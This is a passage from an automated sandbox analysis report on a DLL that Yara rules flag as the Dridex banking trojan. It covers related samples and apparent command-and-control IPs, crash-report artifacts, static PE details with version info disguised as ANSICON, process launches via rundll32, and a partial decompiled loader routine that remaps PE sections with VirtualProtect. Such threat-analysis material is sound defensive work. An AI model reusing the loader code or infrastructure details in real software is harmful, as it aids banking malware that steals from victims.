	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
50.116.27.97	BJKPKLUPiD.dll	Get hash	malicious	Browse
	RuRxpMUPN7.dll	Get hash	malicious	Browse
	u3A1eWFqLE.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	IHUVPJ4hXu.dll	Get hash	malicious	Browse
	CTkT1fRtQv.dll	Get hash	malicious	Browse
	BJKPKLUPiD.dll	Get hash	malicious	Browse
	RuRxpMUPN7.dll	Get hash	malicious	Browse
	qMus8K6kXx.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
94.247.168.64	BJKPKLUPiD.dll	Get hash	malicious	Browse
	RuRxpMUPN7.dll	Get hash	malicious	Browse
	u3A1eWFqLE.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	IHUVPJ4hXu.dll	Get hash	malicious	Browse
	CTkT1fRtQv.dll	Get hash	malicious	Browse
	BJKPKLUPiD.dll	Get hash	malicious	Browse
	RuRxpMUPN7.dll	Get hash	malicious	Browse
	qMus8K6kXx.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DIGITALOCEAN-ASNUS	BJKPKLUPiD.dll	Get hash	malicious	Browse	159.203.93.122
	RuRxpMUPN7.dll	Get hash	malicious	Browse	159.203.93.122
	u3A1eWFqLE.dll	Get hash	malicious	Browse	159.203.93.122
	gsG7jGFk3I.dll	Get hash	malicious	Browse	159.203.93.122
	IHUVPJ4hXu.dll	Get hash	malicious	Browse	159.203.93.122
	CTkT1fRtQv.dll	Get hash	malicious	Browse	159.203.93.122
	BJKPKLUPiD.dll	Get hash	malicious	Browse	159.203.93.122
	RuRxpMUPN7.dll	Get hash	malicious	Browse	159.203.93.122
	qMus8K6kXx.dll	Get hash	malicious	Browse	159.203.93.122
	gsG7jGFk3I.dll	Get hash	malicious	Browse	159.203.93.122
	15sV4KdrCN.dll	Get hash	malicious	Browse	159.203.93.122
	Ce28zthEz1.dll	Get hash	malicious	Browse	159.203.93.122
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	159.203.93.122
	1UmI5PSg3K.dll	Get hash	malicious	Browse	159.203.93.122
	9eYYTTlVYi.dll	Get hash	malicious	Browse	159.203.93.122
	Ce28zthEz1.dll	Get hash	malicious	Browse	159.203.93.122
	15sV4KdrCN.dll	Get hash	malicious	Browse	159.203.93.122
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	159.203.93.122
	1UmI5PSg3K.dll	Get hash	malicious	Browse	159.203.93.122
	9eYYTTlVYi.dll	Get hash	malicious	Browse	159.203.93.122
LINODE-APLinodeLLCUS	BJKPKLUPiD.dll	Get hash	malicious	Browse	50.116.27.97
	RuRxpMUPN7.dll	Get hash	malicious	Browse	50.116.27.97
	u3A1eWFqLE.dll	Get hash	malicious	Browse	50.116.27.97
	gsG7jGFk3I.dll	Get hash	malicious	Browse	50.116.27.97
	IHUVPJ4hXu.dll	Get hash	malicious	Browse	50.116.27.97
	CTkT1fRtQv.dll	Get hash	malicious	Browse	50.116.27.97
	BJKPKLUPiD.dll	Get hash	malicious	Browse	50.116.27.97
	RuRxpMUPN7.dll	Get hash	malicious	Browse	50.116.27.97
	qMus8K6kXx.dll	Get hash	malicious	Browse	50.116.27.97
	gsG7jGFk3I.dll	Get hash	malicious	Browse	50.116.27.97
	15sV4KdrCN.dll	Get hash	malicious	Browse	50.116.27.97
	Ce28zthEz1.dll	Get hash	malicious	Browse	50.116.27.97
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	50.116.27.97
	1UmI5PSg3K.dll	Get hash	malicious	Browse	50.116.27.97
	9eYYTTlVYi.dll	Get hash	malicious	Browse	50.116.27.97
	Ce28zthEz1.dll	Get hash	malicious	Browse	50.116.27.97
	15sV4KdrCN.dll	Get hash	malicious	Browse	50.116.27.97
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	50.116.27.97
	1UmI5PSg3K.dll	Get hash	malicious	Browse	50.116.27.97
	9eYYTTlVYi.dll	Get hash	malicious	Browse	50.116.27.97
GLESYS-ASSE	BJKPKLUPiD.dll	Get hash	malicious	Browse	94.247.168.64
	RuRxpMUPN7.dll	Get hash	malicious	Browse	94.247.168.64
	u3A1eWFqLE.dll	Get hash	malicious	Browse	94.247.168.64
	gsG7jGFk3I.dll	Get hash	malicious	Browse	94.247.168.64
	IHUVPJ4hXu.dll	Get hash	malicious	Browse	94.247.168.64
	CTkT1fRtQv.dll	Get hash	malicious	Browse	94.247.168.64
	BJKPKLUPiD.dll	Get hash	malicious	Browse	94.247.168.64
	RuRxpMUPN7.dll	Get hash	malicious	Browse	94.247.168.64
	qMus8K6kXx.dll	Get hash	malicious	Browse	94.247.168.64
	gsG7jGFk3I.dll	Get hash	malicious	Browse	94.247.168.64
	15sV4KdrCN.dll	Get hash	malicious	Browse	94.247.168.64
	Ce28zthEz1.dll	Get hash	malicious	Browse	94.247.168.64
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	94.247.168.64
	1UmI5PSg3K.dll	Get hash	malicious	Browse	94.247.168.64
	9eYYTTlVYi.dll	Get hash	malicious	Browse	94.247.168.64
	Ce28zthEz1.dll	Get hash	malicious	Browse	94.247.168.64
	15sV4KdrCN.dll	Get hash	malicious	Browse	94.247.168.64
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	94.247.168.64
	1UmI5PSg3K.dll	Get hash	malicious	Browse	94.247.168.64
	9eYYTTlVYi.dll	Get hash	malicious	Browse	94.247.168.64

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_8697bb53893bff1d8dd8d2263efc904abedc64_160cf2be_11f3fcc6\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	9236
Entropy (8bit):	3.76125735490877
Encrypted:	false
SSDEEP:	96:79WXycy9hAS2C5Q56tpXIQcQ6c6n+hcEZcw3P+a+z+HbHgUV6eugtYsaV9w72oNQ:jFHUb+hjbjXq/u7sMS274Itb21
MD5:	CAA15A6509BB763AB3F43B1FB1772B9C
SHA1:	9A83B6B5ED21315D93E1E31383A1008B54740CD5
SHA-256:	DFBBCD118C9889F2DBE89554DDC5C39E10D1F3B170D54002E811F74F4EF7C6F5
SHA-512:	90CC8A7E905F7794B47150752D7A6D42833BA697BF83F352666D92F4B0D64A410F1E618DAB5CB0A66EE5CD4EF5066B2012465F268FFEC7E727BBA3E6AD6A8884
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.3.3.7.5.0.3.8.9.7.7.9.6.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.2.8.9.4.a.8.2.-.7.7.5.0.-.4.f.7.1.-.9.4.c.d.-.d.4.a.5.e.5.c.1.c.0.c.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.0.8.8.1.7.d.-.5.8.c.c.-.4.a.d.b.-.a.1.f.f.-.7.6.6.2.1.e.c.b.3.7.a.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.1.0.-.0.0.0.1.-.0.0.1.6.-.4.e.7.8.-.7.f.1.b.b.1.3.5.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.4././.0.4.:.1.0.:.5.0.:.5.4.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE7E.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Apr 20 06:50:40 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	25018
Entropy (8bit):	2.6609832723504665
Encrypted:	false
SSDEEP:	192:Z7H/OqHxy6P4yD4rfgTu+uCmoEXkQ7gC2U2iOuUv:pPM6w8sZZCzc97T2UHo
MD5:	F815BAB06A0E4DD912BF08A5CD0320E4
SHA1:	99583C293A06FA023D0F11AC5CC4B08AA937DB19
SHA-256:	36356B6E55E6BB78BF40A2F58C48E28E1502D9CEEA329677BE37A1E3F5B63A18
SHA-512:	1CCDBC59D48F6BF512C752BA7FF27774EBB7928182379D41DE9CEBBE057F0117D1141BE867ACF7E24E8C226FA0B66C0CAC5236C2C1E71EF8B36ABEF32450D5F8
Malicious:	false
Reputation:	low
Preview:	MDMP....... ........y~`...................U...........B......,.......GenuineIntelW...........T...........!y~`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF3BF.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8358
Entropy (8bit):	3.6897153012695734
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi5d6fKt6YI5SUa4gmfeS1JCpBT89bqysfQOm:RrlsNij6fKt6Y2SUa4gmfeS1Xqxfw
MD5:	8EDB93A71AD0C73146E0921F9F342E41
SHA1:	5EB6FACDD8B7047C3ECE3C2F51A46C51AAFEE439
SHA-256:	79D136AE0744F98416AAADC2613878BBA64FDB1F3226002665F3176785444962
SHA-512:	6E8FC6751E8F8974A2EE6C158D0AD6AB308C65A4A9A660B534DC50167A9E33D966E4797B4AB18B7055A803EEEFBD86C5B36BF5293FA2E244550E9742FD6D6327
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.5.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF6AE.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4658
Entropy (8bit):	4.427562864128179
Encrypted:	false
SSDEEP:	48:cvIwSD8zs5JgtWI90iWSC8BI8fm8M4JVh9FQ+q8v7h5+mKcQIcQw6UrJd:uITfLPjSNfJroK15+mKkw68Jd
MD5:	84525A785735DB6B4E3B65E0B6D622B1
SHA1:	0492EC5FEB6A78A2A443D3A9A2D72071CC8A9534
SHA-256:	37AA0F6505690A5A5A48983BA78A9AA6DFE521A4655341E3AC9740C95BAEA821
SHA-512:	FD8D2E99FEDB007D081FF6C7D324678FA81ACB4C6829D983BD9BEC49E9F48F975D54D643EF9FA2ECC40E134B4229FA11C806893029C901B6FF0A6287DB3D977E
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="954241" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.548571384698519
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	CTkT1fRtQv.dll
File size:	163840
MD5:	304c6fb5258a065507a5ea8625fbf120
SHA1:	386f11c61362582fb431758483579cef18094043
SHA256:	ab022d18682f942315316baa838852c3010df92e79f645b37c7afd2b85623b2b
SHA512:	2352167e950c825115caf6f51a6a9bbd52d7dc2fae1ab3a7502b0d7ccc1dcf1e8a5ddfec6a8e09d26595544fb9ed9375a922115bd26aafbb08c4ace349fc27cd
SSDEEP:	3072:PWX2IjzzpM+PncPeY8+O3AU3HRIHPh3UGfXy0BHNkIv/ScbQQ2y0iNM0+y+N0tc:P42IfzNPnoeY8j3AsHGPXpHNj6rByM3
File Content Preview:	MZ......................@...........................................[}..[}..[}..[}...}..@.2..\|..=.T..}....S.z\|..@..._}..\|...T\|..V/C..\|..V/E..\|..Rich[}..............PE..L.....}`...........!.........f.......D.......P....@....................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x424410
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x607DE4E3 [Mon Apr 19 20:15:31 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	b84fd50f2389cfd5bd83e2cf062986d1

Entrypoint Preview

Instruction
mov edx, 00000000h
mov edx, 00000000h
cmpss xmm1, xmm2, 03h
sub eax, 00002233h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
cmpss xmm1, xmm2, 03h
cmp edx, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
je 00007EFF68B0703Bh
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1001	0x0	.text
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2768c	0x59	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x340	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2d000	0x14c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x25040	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x25000	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x23a97	0x23600	False	0.761560015459	data	7.55877156847	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x25000	0x2a67	0x2a00	False	0.791573660714	data	7.53164670284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x28000	0x3588	0x1600	False	0.783380681818	MMDF mailbox	7.34765964879	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x784	0x400	False	0.390625	data	2.73456990044	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2d000	0xd2b	0x200	False	0.62890625	data	4.21021599876	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x2c060	0x2e0	data	English	United States

Imports

DLL	Import
KERNEL32.dll	CloseHandle, OpenSemaphoreW, LoadLibraryExA, GetModuleHandleW, OutputDebugStringA, GetProfileSectionW
OPENGL32.dll	glTexSubImage1D
ole32.dll	CreateStreamOnHGlobal
USER32.dll	TranslateMessage
ADVAPI32.dll	RegLoadAppKeyW

Version Infos

Description	Data
LegalCopyright	Freeware
InternalName	ANSI32
FileVersion	1.66
CompanyName	Jason Hood
Comments	http://ansicon.adoxa.vze.com/
ProductName	ANSICON
ProductVersion	1.66
FileDescription	ANSI Console
OriginalFilename	ANSI32.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 1552 Parent PID: 5588

General

Start time:	23:48:01
Start date:	19/04/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\CTkT1fRtQv.dll'
Imagebase:	0xb30000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6164 Parent PID: 1552

General

Start time:	23:48:02
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\CTkT1fRtQv.dll',#1
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6204 Parent PID: 6164

General

Start time:	23:48:02
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\CTkT1fRtQv.dll',#1
Imagebase:	0x850000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6544 Parent PID: 1552

General

Start time:	23:48:34
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\CTkT1fRtQv.dll',ReadLogRecord
Imagebase:	0x850000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000006.00000002.631275717.0000000073311000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 4504 Parent PID: 1552

General

Start time:	23:50:36
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1552 -s 420
Imagebase:	0x1350000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 1552 Parent PID: 5588 loaddll32.exeCOMMON

Executed Functions

Function 00B92213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00B92213(long __ebx, long __edi, void* __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				void* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char* _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				int _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr* _t136;
				int _t143;
				int _t151;
				int _t155;
				intOrPtr _t170;
				int _t177;
				void* _t226;
				intOrPtr _t229;
				intOrPtr _t234;
				void* _t236;
				intOrPtr* _t240;
				intOrPtr _t247;
				intOrPtr _t251;
				DWORD* _t264;
				void* _t268;
				intOrPtr* _t271;
				intOrPtr* _t272;

				_t136 = _a4;
				_v20 = 0;
				_t236 =  *((intOrPtr*)(_t136 + 0x40));
				 *0xb94418 = 1;
				asm("movaps xmm0, [0xb93010]");
				asm("movups [0xb94428], xmm0");
				_v48 = _t136;
				_v52 =  *((intOrPtr*)(_t136 + 0x64));
				_v56 =  *((intOrPtr*)(_v48 + 8));
				_v184 = _t236;
				_v60 =  *((intOrPtr*)(_v48 + 0x50));
				_v180 = _v52;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t136 + 0x60));
				_v68 = 4;
				_v72 = _t236;
				_v76 =  &_v20;
				_t143 = VirtualProtect(__esi, __edi, __ebx, _t264); // executed
				_v80 = _t143;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x64));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E00B92569();
				E00B91D28(_v72,  *((intOrPtr*)(_v48 + 0xc)), _v56);
				E00B92569( *((intOrPtr*)(_v48 + 0xc)), 0, _v56);
				_t151 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t271 = _t268 - 0x88;
				_t226 = _v72;
				_t251 =  *((intOrPtr*)(_t226 + 0x3c));
				_v100 = _t151;
				_v104 = _v72 + 0x3c;
				_v108 = _t226;
				_v112 = _t251;
				if(_t251 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v108;
				if(_v60 != 0) {
					_v148 = 0;
					_v152 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					while(1) {
						_t170 = _v152;
						_v160 = _t170;
						_t247 = _v160;
						_v184 = _v72 +  *((intOrPtr*)(_t247 + 0xc));
						_v180 =  *((intOrPtr*)(_t247 + 8));
						_v176 =  *((intOrPtr*)(0xb94418 + (( *(_t170 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t170 + 0x24) >> 0x1f << 3) + (( *(_t170 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v164 = _v148;
						_t177 = VirtualProtect(??, ??, ??, ??); // executed
						_t271 = _t271 - 0x10;
						_t234 = _v164 + 1;
						_v168 = _t177;
						_v148 = _t234;
						_v152 = _v160 + 0x28;
						if(_t234 == _v60) {
							goto L9;
						}
					}
				}
				L9:
				 *_t271 = _v72;
				_v124 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
				_t155 = DisableThreadLibraryCalls(??);
				_t272 = _t271 - 4;
				_t229 =  *_v104;
				_v156 = _t155;
				_v116 = _t229;
				_v120 = _v72;
				if(_t229 != 0) {
					_v120 = _v72 + (_v116 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t240 = _v48;
				_v44 =  *((intOrPtr*)(_t240 + 0x20));
				_v40 =  *((intOrPtr*)(_t240 + 0x18));
				_v36 =  *((intOrPtr*)(_t240 + 0x34));
